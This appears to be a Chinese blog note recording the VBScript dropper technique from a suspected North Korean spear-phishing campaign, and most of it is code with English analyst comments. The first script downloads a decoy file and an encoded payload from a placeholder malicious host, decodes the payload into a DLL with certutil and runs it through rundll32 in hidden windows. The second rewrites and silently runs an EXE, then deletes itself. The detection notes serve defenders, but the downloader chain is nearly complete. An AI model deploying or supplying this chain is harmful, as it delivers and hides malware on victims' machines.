利用VBS下载EXE文件手法记录
2024-08-24 22:02:25
1、信息来源
疑似朝鲜通过鱼叉攻击韩国统一部记者的APT事件整理
https://mp.weixin.qq.com/s/4IFV31MBNbANnCVaJj7ZPQ
https://twitter.com/blackorbird/status/1082553543280680962
2、利用思路
1、 下载http://恶意网址/note[.]png作为文件到%temp%路径下,通过【powershell Invoke-item】运行。
2、 下载http://恶意网址/svchow.dat改名为svchow[.]dat
3、 通过 certutil -f -decode 对 svchow.dat 进行 base64 解码,强制覆盖已有文件,并将输出保存为 dll
4、 通过powershell运行rundll32,加载svchow.dll中的MyRTLCreateFunction导出函数以运行恶意代码。
3、实例代码
下载代码:
' Analyst-annotated sample: two-stage VBScript downloader.
' Stage 1 fetches note.png over plain HTTP into %TEMP% and opens it with
' PowerShell Invoke-Item. Stage 2 fetches svchow.dat, decodes it with certutil
' into svchow.dll and calls its MyRTLCreateFunction export through rundll32.
' The host part of both URLs is a placeholder used by the write-up, not a real IoC.
' Observable behaviour for detection (all visible in the lines below):
'   - a script host creating Microsoft.XMLHTTP / Adodb.Stream objects and writing
'     files under %TEMP%
'   - powershell started with a hidden window to run certutil -f -decode
'   - certutil output with a .dll extension in %TEMP%
'   - rundll32 loading a DLL from %TEMP% with an explicit export name
Set wshShell = CreateObject("Wscript.shell")
' Resolve the current user's temp directory; every file below is written there.
dir = wshShell.ExpandEnvironmentStrings("%TEMP%")
docUrl = "http://恶意网址/note.png"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
' Third argument False makes the request synchronous, so Send blocks until the
' response has arrived.
xHttp.Open "GET", docUrl, False
xHttp.Send
docPath = dir + "\note.png"
' Write the raw response body to disk unchanged (binary stream, overwrite mode).
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile docPath, 2 '//overwrite
end With
' Run arguments: window style 0 (hidden) and wait-on-return true.
' Invoke-Item opens the file with its registered handler.
' NOTE(review): note.png is presumably a decoy shown to the user - the listing
' itself does not confirm this.
CreateObject("Wscript.shell").Run "powershell Invoke-item '" + dir + "\note.png'", 0, true
' Second download: same pattern, saved as svchow.dat.
docUrl = "http://恶意网址/svchow.dat"
dim xHttp2: Set xHttp2 = createobject("Microsoft.XMLHTTP")
dim bStrm2: Set bStrm2 = createobject("Adodb.Stream")
xHttp2.Open "GET", docUrl, False
xHttp2.Send
with bStrm2
.type = 1 '//binary
.open
.write xHttp2.responseBody
.savetofile dir + "\svchow.dat", 2 '//overwrite
end With
' certutil -f -decode: base64-decode svchow.dat into svchow.dll, overwriting any
' existing output file. The payload therefore crosses the network and first
' lands on disk as encoded text rather than as a PE file.
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden certutil -f -decode " & dir & "\svchow.dat, " & dir & "\svchow.dll",0,true
' rundll32 loads the decoded DLL and calls the named export. The resulting
' process chain is script host -> powershell -> cmd -> rundll32.
CreateObject("Wscript.shell").Run "powershell -windowstyle hidden cmd /c rundll32 " & dir & "\svchow.dll,MyRTLCreateFunction",0,true
转码运行exe:
' Analyst-annotated sample: rewrites a file already present at
' C:\windows\temp\xxx.exe by dropping its first two bytes, runs the result with
' a hidden window, then deletes the script file.
' Everything after the byte check sits inside the If block, so nothing is
' rewritten, run or deleted unless the file starts with the bytes 255, 254.
' Observable behaviour for detection: a script host overwriting an .exe under
' C:\windows\temp and then launching it, followed by deletion of the script.
Dim fIn, fOut, sFilename, sBOM
sFilename = "C:\windows\temp\xxx.exe"
Set fIn = CreateObject("adodb.stream")
fIn.Type = 1 'adTypeBinary
' NOTE(review): adModeRead is not defined anywhere in this listing - confirm
' whether a constant definition was dropped from the excerpt.
fIn.Mode = adModeRead
fIn.Open
fIn.LoadFromFile sFilename
' Read the first five bytes; only the first two are inspected below.
sBOM = fIn.Read(5)
' UTF8 BOM is 0xEF,0xBB,0xBF (decimal 239, 187, 191)
' NOTE(review): the check that follows compares against 255, 254 (0xFF 0xFE, the
' UTF-16 LE byte-order mark), not the UTF-8 values named in the comment above.
' Presumably the file was written with this two-byte prefix, which would mean it
' does not start with a PE header until this script rewrites it - assumption,
' not shown in the listing.
If AscB(MidB(sBOM, 1, 1)) = 255 _
And AscB(MidB(sBOM, 2, 1)) = 254 Then
fIn.Position = 2 ' Skip BOM
Set fOut = CreateObject("adodb.stream")
fOut.Type = 1 'adTypeBinary
' NOTE(review): adModeReadWrite is likewise not defined in this listing.
fOut.Mode = adModeReadWrite
fOut.Open
' Copy everything from byte offset 2 onward, then overwrite the original path.
fIn.CopyTo fOut
fOut.SaveToFile sFilename, 2 'adSaveCreateOverwrite
fOut.Flush
fOut.Close
Set shell = CreateObject("Wscript.Shell")
' Window style 0 (hidden), wait-on-return False: the script continues without
' waiting for the launched process to exit.
shell.Run "c:\windows\temp\xxx.exe",0,False
Set fso = CreateObject("Scripting.FileSystemObject")
' Self-deletion: removes the file named by WScript.ScriptName, so the script
' may be gone from disk by the time a responder looks for it.
fso.DeleteFile(WScript.ScriptName)
End If